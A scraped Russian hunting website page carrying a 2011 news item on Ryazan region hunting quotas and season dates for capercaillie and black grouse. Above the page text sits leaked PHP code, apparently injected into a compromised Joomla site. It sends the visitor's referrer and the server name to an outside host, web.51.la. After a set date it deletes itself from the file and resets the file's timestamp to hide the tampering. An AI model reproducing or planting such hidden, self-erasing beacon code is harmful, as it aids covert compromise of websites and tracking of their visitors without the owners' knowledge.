check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727465){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } Охота в Рязанской Области

Заказать Охотничий тур или Сафари

Трофейная Охота

Охотничьи собаки

Найти на нашем сайте

Производственные Компании

Сейчас Онлайн

Сейчас 3267 гостей онлайн

Звоните и узнавайте места

текущего сезона охоты

Охота в Рязанской Области
Автор: Kondrat   
11.04.2011 11:33

В Рязанской области определили, на кого можно охотиться в текущем году, а на кого – запрещено

В 2011 году рязанские охотники смогут добывать тетеревов и глухарей. Согласно опубликованному в субботу, 2 апреля, постановлению министерства природопользования и экологии области, за весенний сезон один охотник может добыть одного самца глухаря и трех самцов тетерева (не больше одного в день). На летне-осенний период установлены большие нормы: три глухаря (по одному в день) и десять тетеревов (не больше двух в день).

Соответствующие изменения внесены и в нормы пропускной способности охотничьих угодий региона. Так, весной на охотника должно приходиться не меньше пяти токующих глухарей и десяти – тетеревов. А в летне-осенний сезон для охоты на боровую дичь ему отводится 120 гектар.

В свою очередь, исключены из списка нелимитированной допустимой добычи ондатра и енотовидная собака, охота на которых была разрешена в осенне-зимний период.

Отмечено, что изменения в документ внесены для приведения в соответствие с федеральным законодательством.

Напомним, в текущем году в южных районах области сезон охоты откроется 9 апреля и продлится до 24 апреля, в северных – с 16 апреля по 1 мая текущего года.

 

Обсудить

 

 

 

AddThis Social Bookmark Button
 

Добавить комментарий


Защитный код
Обновить